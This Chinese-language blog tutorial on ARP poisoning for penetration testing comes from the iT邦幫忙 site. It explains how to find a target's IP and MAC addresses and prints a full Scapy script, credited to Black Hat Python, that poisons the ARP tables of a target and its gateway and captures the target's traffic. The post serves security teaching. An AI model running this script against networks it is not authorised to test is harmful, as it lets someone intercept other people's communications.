iT邦幫忙

1

滲透測試:ARP汙染

原理

ARP汙染是使攻擊機位於閘道與目標機之間,使目標機相信我們是閘道、使閘道相信流量需經過我們才可到達目標機。

動手試試

行萬里路勝於讀萬卷書,多練習就會上手Der。

獲取MAC地址

為獲得目標MAC地址,首先我們得獲得受測對象的IP位置,方法百百種,在這裡我們使用netstat -n命令顯示活動中的TCP連接local address:自己主機的ip,foreign address:目的機器ip。

  1. 與目標建立通訊,回到命令程序,查看變化,新增的IP地址就是對方IP。
  2. 方法也百百種,這邊使用arp -a {目標IP}目標IP為上面所得到的IP位址,其中的"Physical Address"就是MAC地址囉。

獲取Gateway

在這裡,由於是使用區域連線,所以我的閘道和目標的閘道會是一樣的,使用ipconfig,下圖可以看到是192.168.0.1:

在使用一次arp -a查看閘道的MAC位置。

ARP汙染

使用Python2的Scapy套件:

from scapy.all import *
import os
import sys
import threading

interface    = "en1"
target_ip    = "172.16.1.71"
gateway_ip   = "172.16.1.254"
packet_count = 1000
poisoning    = True
    
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    
    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
    
def get_mac(ip_address):
    
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    
    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src
    
    return None
    
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    global poisoning
   
    poison_target = ARP()
    poison_target.op   = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac

    poison_gateway = ARP()
    poison_gateway.op   = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while poisoning:
        send(poison_target)
        send(poison_gateway)
          
        time.sleep(2)
          
    print "[*] ARP poison attack finished."

    return

# set our interface
conf.iface = interface

# turn off output
conf.verb  = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)
    
# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count
    
    bpf_filter  = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
    
except KeyboardInterrupt:
    pass

finally:
    # write out the captured packets
    print "[*] Writing packets to arper.pcap"
    wrpcap('arper.pcap',packets)

    poisoning = False

    # wait for poisoning thread to exit
    time.sleep(2)

    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)

為了使本機知道我們可以為閘道與目標IP轉發封包,所以使用以下指令:
echo 1 > /proc/sys/net/ipv4/ip_forward

資料來源

獲得IP
獲得MAC地址
黑帽Python


尚未有邦友留言

立即登入留言